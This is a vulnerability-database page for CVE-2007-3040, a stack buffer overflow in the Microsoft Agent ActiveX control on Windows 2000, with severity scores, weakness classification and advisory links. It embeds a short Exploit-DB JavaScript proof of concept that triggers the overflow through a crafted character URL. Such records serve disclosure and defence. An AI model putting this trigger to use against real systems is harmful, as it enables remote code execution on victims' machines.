CVE-2007-3040 : Detail

CVE-2007-3040

Overflow
55.57%V4
Network
2007-09-11
23h00 +00:00
2018-10-16
12h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Stack-based buffer overflow in agentdpv.dll 2.0.0.3425 in Microsoft Agent on Windows 2000 SP4 allows remote attackers to execute arbitrary code via a crafted URL to the Agent (Agent.Control) ActiveX control, which triggers an overflow within the Agent Service (agentsrv.exe) process, a different issue than CVE-2007-1205.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer
The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data.

Metrics

Metrics Score Severity CVSS Vector Source
V2 9.3 AV:N/AC:M/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 30567

Publication date : 2007-09-10 22h00 +00:00
Author : Yamata Li
EDB Verified : Yes

source: https://www.securityfocus.com/bid/25566/info Microsoft Agent (agentsvr.exe) is prone to a stack-based buffer-overflow vulnerability because the application fails to adequately bounds-check user-supplied data. Successfully exploiting this issue allows remote attackers to execute arbitrary code in the context of the currently logged-in user. Failed exploit attempts will likely result in denial-of-service conditions. <script language="javascript"> function document::OnClick() { var agent, character, url; agent = new ActiveXObject("Agent.Control.2"); agent.connected = true; agent.Characters.Load("Genie", "http:///"); character = agent.Characters.Character("Genie"); character.Show(); character.Think ("brazil owns!"); character.Speak('brazil owns!'); character.Play('Processing'); } </script>

Products Mentioned

Configuraton 0

Microsoft>>Windows_2000 >> Version *

References

http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=592
Tags : third-party-advisory, x_refsource_IDEFENSE
http://www.securityfocus.com/bid/25566
Tags : vdb-entry, x_refsource_BID
http://securityreason.com/securityalert/3124
Tags : third-party-advisory, x_refsource_SREASON
http://secunia.com/advisories/26753
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.us-cert.gov/cas/techalerts/TA07-254A.html
Tags : third-party-advisory, x_refsource_CERT
http://securitytracker.com/id?1018677
Tags : vdb-entry, x_refsource_SECTRACK
http://www.vupen.com/english/advisories/2007/3113
Tags : vdb-entry, x_refsource_VUPEN
http://www.osvdb.org/36934
Tags : vdb-entry, x_refsource_OSVDB
http://www.kb.cert.org/vuls/id/716872
Tags : third-party-advisory, x_refsource_CERT-VN